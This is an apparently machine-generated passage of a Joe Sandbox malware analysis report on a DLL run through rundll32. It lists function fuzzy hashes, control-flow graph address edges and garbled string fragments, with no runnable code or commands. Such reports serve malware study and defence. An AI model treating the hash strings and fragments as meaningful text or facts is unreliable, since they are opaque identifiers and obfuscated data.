                                                                                                                                                • Opcode Fuzzy Hash: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                                                                                                • Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 252 18000c608-18000c62d 253 18000c632-18000c637 252->253 254 18000cc8a-18000cc8f 253->254 255 18000c63d 253->255 256 18000cc95-18000cc9a 254->256 257 18000cf2b-18000cfaf call 18001f7c0 call 18001c32c 254->257 258 18000c643-18000c648 255->258 259 18000cb7d-18000cc23 call 1800269b0 call 18001c32c 255->259 261 18000ce33-18000ced7 call 180008ad8 call 18001c32c 256->261 262 18000cca0-18000cca5 256->262 285 18000cfb4-18000d00a call 1800194a4 257->285 263 18000caa5-18000cb78 call 1800176b8 call 18001c32c call 1800194a4 258->263 264 18000c64e-18000c653 258->264 286 18000cc28-18000cc85 call 1800194a4 259->286 300 18000cedc-18000cf26 call 1800194a4 261->300 268 18000cd35-18000cdce call 18000703c call 18001c32c 262->268 269 18000ccab-18000ccb0 262->269 263->253 271 18000c9c1-18000ca52 call 18002870c call 18001c32c 264->271 272 18000c659-18000c65e 264->272 305 18000cdd3-18000ce2e call 1800194a4 268->305 279 18000ccb6-18000cd30 call 180021434 269->279 280 18000d00f-18000d014 269->280 308 18000ca57-18000caa0 call 1800194a4 271->308 282 18000c664-18000c669 272->282 283 18000c8bb-18000c963 call 180002610 call 18001c32c 272->283 279->253 280->253 288 18000d01a-18000d020 280->288 292 18000c7b2-18000c85a call 180019618 call 18001c32c 282->292 293 18000c66f-18000c674 282->293 316 18000c968-18000c9bc call 1800194a4 283->316 285->280 286->253 325 18000c85f-18000c8b6 call 1800194a4 292->325 293->280 303 18000c67a-18000c73d call 180002178 call 18001c32c 293->303 300->253 326 18000c742-18000c7ad call 1800194a4 303->326 305->253 308->253 316->253 325->253 326->253
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.278077308.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: +#;)$K'$sf$w\H
                                                                                                                                                • API String ID: 0-1051058546
                                                                                                                                                • Opcode ID: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                                                                                                • Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
                                                                                                                                                • Opcode Fuzzy Hash: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                                                                                                • Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.278077308.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: <4P$<8$<w.
                                                                                                                                                • API String ID: 0-1030867500
                                                                                                                                                • Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                                                                                                • Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
                                                                                                                                                • Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                                                                                                • Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.278077308.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                                                • Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
                                                                                                                                                • Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                                                • Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 358 180022010-18002203b 359 18002203d-180022043 358->359 360 180022338-1800223a1 call 18001455c 359->360 361 180022049-18002204f 359->361 368 1800223a6-1800223ac 360->368 362 180022055-18002205b 361->362 363 18002232e-180022333 361->363 366 180022061-180022067 362->366 367 1800222be-180022329 call 180019cb4 362->367 363->359 370 180022069-18002206f 366->370 371 18002209a-1800222b9 call 18001dbe8 call 180012320 call 1800194a4 366->371 367->359 368->359 372 1800223b2-1800223c2 368->372 370->368 375 180022075-180022083 370->375 371->368 376 180022089-18002208d 375->376 378 180022085-180022086 376->378 379 18002208f-180022098 376->379 378->376 379->359
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.278077308.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: "+H$1l7.$M8;$]$d$]k$]k$94
                                                                                                                                                • API String ID: 0-2447245168
                                                                                                                                                • Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                                                                                                • Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
                                                                                                                                                • Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                                                                                                • Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 568 1800059b8-180005a02 569 180005a04-180005a09 568->569 570 180006107-1800061a6 call 180001b1c 569->570 571 180005a0f-180005a14 569->571 583 1800061ab-1800061b0 570->583 572 180005a1a-180005a1f 571->572 573 180005fcd-180006102 call 180016314 571->573 576 180005a25-180005a2a 572->576 577 180005da6-180005fb1 call 1800093f0 572->577 573->569 581 1800061bb-18000625a call 180001b1c 576->581 582 180005a30-180005a35 576->582 590 180005fc3-180005fc8 577->590 591 180005fb3-180005fbe 577->591 588 18000625f-180006271 581->588 585 180005a3b-180005a40 582->585 586 180005d7e-180005d8c 582->586 587 1800061b6 583->587 583->588 592 180005a46-180005a4b 585->592 593 180005b78-180005d79 call 180009f5c call 18000a62c call 1800194a4 585->593 594 180005d92-180005d96 586->594 587->569 590->569 591->569 598 180005a51-180005a56 592->598 599 180005ad8-180005b68 call 18000abac 592->599 593->569 595 180005d98-180005da1 594->595 596 180005d8e-180005d8f 594->596 595->569 596->594 598->583 602 180005a5c-180005ad3 call 180007958 598->602 599->588 607 180005b6e-180005b73 599->607 602->569 607->569
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.278077308.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
                                                                                                                                                • API String ID: 0-2100131636
                                                                                                                                                • Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                                                • Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
                                                                                                                                                • Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                                                • Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 611 180013780-1800137f4 call 1800142a0 614 1800137fb-180013800 611->614 615 180013806-18001380b 614->615 616 180013c55-180013ce4 call 18002620c 614->616 617 180013811-180013816 615->617 618 180013c4b-180013c50 615->618 625 180013ce6-180013ceb 616->625 626 180013cf0 616->626 620 18001381c-180013821 617->620 621 1800138cd-180013c46 call 180006664 call 18000bb28 call 18002a6c8 call 1800194a4 617->621 618->614 623 180013cf5-180013cfa 620->623 624 180013827-1800138a9 call 18000290c 620->624 621->614 629 1800138ae-1800138cc 623->629 630 180013d00 623->630 624->629 625->614 626->623 630->614
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.278077308.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: $$"`2$lbzZ$lmq$tro$kO
                                                                                                                                                • API String ID: 0-2401169580
                                                                                                                                                • Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                                                • Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
                                                                                                                                                • Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                                                • Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.278077308.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: )#?$EX.$PT$UbA$2f
                                                                                                                                                • API String ID: 0-1318892062
                                                                                                                                                • Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                                                • Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
                                                                                                                                                • Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                                                • Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 676 18001fc0c-18001fc44 call 1800142a0 679 18001fc46-18001fc4b 676->679 680 18001fc51 679->680 681 18001ff13-18001ff18 679->681 682 18001fe94-18001ff0e call 180012598 680->682 683 18001fc57-18001fc5c 680->683 684 180020169-1800201f9 call 1800190d4 681->684 685 18001ff1e-18001ff23 681->685 682->679 687 18001fc62-18001fc67 683->687 688 18001fde5-18001fe8f call 180012598 683->688 702 1800201fe-180020203 684->702 689 1800200b6-180020164 call 180012598 685->689 690 18001ff29-18001ff2e 685->690 695 18002020a-18002026b call 1800190d4 687->695 696 18001fc6d-18001fc72 687->696 688->679 689->679 698 1800200a1-1800200b1 call 1800014f8 690->698 699 18001ff34-18001ff39 690->699 711 180020270-180020291 695->711 706 18001fc78-18001fc7d 696->706 707 18001fd57-18001fde0 call 180012598 696->707 698->679 700 180020003-180020091 call 180021434 699->700 701 18001ff3f-18001ff44 699->701 700->711 723 180020097-18002009c 700->723 701->702 709 18001ff4a-18001fffe call 180012598 701->709 710 180020205 702->710 702->711 715 18001fc83-18001fc88 706->715 716 18001fd1f-18001fd52 706->716 707->679 709->679 710->679 715->702 720 18001fc8e-18001fd1a call 18001e938 715->720 716->679 720->679 723->679
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.278077308.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: $T$?F$QP|m$qjf$tZp
                                                                                                                                                • API String ID: 0-3477398917
                                                                                                                                                • Opcode ID: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                                                • Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
                                                                                                                                                • Opcode Fuzzy Hash: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                                                • Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.278077308.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: JQ$k&($t$v$x\J
                                                                                                                                                • API String ID: 0-1134872184
                                                                                                                                                • Opcode ID: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                                                • Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
                                                                                                                                                • Opcode Fuzzy Hash: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                                                • Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.278077308.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: R$)H8$?rIc$L==$V
                                                                                                                                                • API String ID: 0-2512384441
                                                                                                                                                • Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                                                • Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
                                                                                                                                                • Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                                                • Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.278077308.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: Qq$bt$vird$+$S
                                                                                                                                                • API String ID: 0-3373980505
                                                                                                                                                • Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                                                • Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
                                                                                                                                                • Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                                                • Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.278077308.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: V$@$P9$^_"
                                                                                                                                                • API String ID: 0-1880944046
                                                                                                                                                • Opcode ID: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                                                                                                • Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
                                                                                                                                                • Opcode Fuzzy Hash: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                                                                                                • Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.278077308.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: =_$F)k$b/$syG
                                                                                                                                                • API String ID: 0-3955183656
                                                                                                                                                • Opcode ID: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                                                                                                • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                                                                                                • Opcode Fuzzy Hash: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                                                                                                • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.278077308.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: #X$'Xsa$iJ6$vG
                                                                                                                                                • API String ID: 0-746338152
                                                                                                                                                • Opcode ID: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                                                • Instruction ID: 8ba50615c78112980223cca8f04f1fa67c4b69ee5a809e4e0bd2b8ae6832a1bb
                                                                                                                                                • Opcode Fuzzy Hash: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                                                • Instruction Fuzzy Hash: 93E154B590070DDFCB88DF68D19A9DD7BB9BB49308F404029FC0E9A264D3B4E919CB56
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.278077308.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: *i^$MIC$-Z$]2
                                                                                                                                                • API String ID: 0-498664264
                                                                                                                                                • Opcode ID: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                                                                                                • Instruction ID: 9792ecb135b2155067e966d5e38dbf4f409fde80c29e70d57d2078ebe1ce15c6
                                                                                                                                                • Opcode Fuzzy Hash: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                                                                                                • Instruction Fuzzy Hash: 10E1C670109B888FDBF8DF64CC86BEB7BA5FB44346F10651DD84A8A290DBB46645CF41
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.278077308.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: B$EG$QsF$_
                                                                                                                                                • API String ID: 0-784369960
                                                                                                                                                • Opcode ID: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                                                • Instruction ID: 62dbbc71664ee0946fffbba3b71afe09b12d9ffe0d1744d6deb9db65ff0cd9cc
                                                                                                                                                • Opcode Fuzzy Hash: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                                                • Instruction Fuzzy Hash: 3FB1387010468D8FDF88DF28C88A6DA3FA1FB68388F614219FC4A97250C778D694CBC5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.278077308.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: -`G$.$5B.Y$Z`35
                                                                                                                                                • API String ID: 0-1363032466
                                                                                                                                                • Opcode ID: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                                                • Instruction ID: b244d414363a4385de25ad5610b22aaac7fb2f2c92cf8150697ad32e565f4bd8
                                                                                                                                                • Opcode Fuzzy Hash: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                                                • Instruction Fuzzy Hash: 29A1FB716157888FEB7ADF24C89A7CE7BE1FB49308F40461DD98E8A250D7B49609CB42
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.278077308.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: *+_$WSh$\O$#o
                                                                                                                                                • API String ID: 0-1846314129
                                                                                                                                                • Opcode ID: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                                                • Instruction ID: 175ce4bc0e22c7a636d32034be2bbb8ad42f6b3cb6a748f64f507b7f0b29ed37
                                                                                                                                                • Opcode Fuzzy Hash: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                                                • Instruction Fuzzy Hash: 1971167160474ECFCB98DF18C489ADA3BE1FB58318F414529FC09A7264DB74DAA8CB85
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.278077308.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: .B$O$M*K$\<
                                                                                                                                                • API String ID: 0-3225238681
                                                                                                                                                • Opcode ID: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                                                • Instruction ID: 95d2fbb8f7fe970b1359d27f41ccd6aad584115d4fee043204e0c0f4c3f3b287
                                                                                                                                                • Opcode Fuzzy Hash: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                                                • Instruction Fuzzy Hash: 7181E370549788CFEBBACF24C886BDE7BE4FB48744F20461DE85A8A260DB709645CF41
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.278077308.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: $$$$xVO$~O
                                                                                                                                                • API String ID: 0-3655128719
                                                                                                                                                • Opcode ID: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                                                • Instruction ID: 8f78542db34460f4381821bab2b7e4f68a699ed7f8b2fc47c959991f0b02677a
                                                                                                                                                • Opcode Fuzzy Hash: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                                                • Instruction Fuzzy Hash: 5B61D1B05187448FD369DF28C18965BBBF1FBC6744F008A1EF6868A260DB76D948CB47
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.278077308.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: ,IW$G$JMg$l
                                                                                                                                                • API String ID: 0-1370644289
                                                                                                                                                • Opcode ID: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                                                                                                • Instruction ID: 7fb8b97fd43ed4dc52a467cdcf5cca41e6e56dbc92574a5c866222c6b731b82a
                                                                                                                                                • Opcode Fuzzy Hash: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
